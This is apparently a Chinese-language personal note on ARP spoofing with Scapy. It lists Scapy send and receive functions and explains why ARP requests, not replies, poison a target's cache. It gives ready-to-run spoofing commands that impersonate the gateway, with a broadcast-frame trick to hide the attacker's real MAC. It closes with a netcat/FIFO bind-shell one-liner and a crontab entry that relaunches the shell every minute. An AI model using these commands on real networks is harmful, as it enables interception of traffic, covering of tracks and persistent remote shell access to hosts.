scapy 中的ARP
scapy 常用命令
ls() //查看支持的协议对象
lsc() //查看函数
show() //查看数据包结构
send() //三层发包
sr() //三层收发
sr1() //三层收发只收一 timeout指定超时 verbose指定详情
sendp() //二层发包
srp() //二层收发
srp1() //二层收发只收一 timeout指定超时 verbose指定详情
为什么选用op=1(who has)能欺骗成功, 而op=2(is-at)无法欺骗成功?
分析:
使用whohas 时,攻击机发送 who has 192.168.10.66 tell 192.168.10.1
所以当66主机接受到该询问包时,就会记录发送请求的 源IP 和 源MAC ,
而源IP是假的, 所以欺骗成功
而 使用is-at时,攻击机先询问 who has 192.168.10.66 tell 192.168.10.16
16是攻击机,所以此时目标66收到该询问包时就已经记录了 192.168.10.16 和 16的MAC
地址映射,而后发送的 192.168.10.1 is at 16的MAC 就已经没有用了
总结:
ARP欺骗一台主机,只有通过发送ARP请求包,对方才收到请求自己的MAC地址时,
会把源IP和源MAC映射记录,这一过程是欺骗的关键,也就是被动欺骗,通过op=2
主动和对方说某IP是某MAC地址这样的方式是不会被记录的。
为什么欺骗成功后,自己的真实的IP-MAC会被目标记录
因为如果直接ARP发包,不指名 Ether包,系统默认会先去请求目标端mac地址
这个过程就被记录了真实的,然后通过返回的目标mac构造第二层数据帧来发送
只要自己发送广播帧,就可以避免请求查询mac地址的这一过程,从而避免漏出痕迹
下面发包不带痕迹清理
send(ARP(psrc="192.168.10.1", pdst="192.168.10.66"));
下面是两个有效的发包(带痕迹清理)
监听模式
sendp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(psrc="192.168.10.1", pdst="192.168.10.66"))
防护模式
sendp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(psrc="192.168.10.16", hwsrc="8c:89:a5:8f:4a:d7", pdst="192.168.10.66"))
mkfifo /tmp/tmp_fifo
cat /tmp/tmp_fifo | /bin/sh 2>&1 | nc -l 端口 > /tmp/tmp_fifo
----------------------------------------------------------------
crontab -e
* * * * * sleep 0;cat /tmp/tmp_fifo | /bin/sh 2>&1 | nc -l 端口 > /tmp/tmp_fifo
每分钟执行一次命令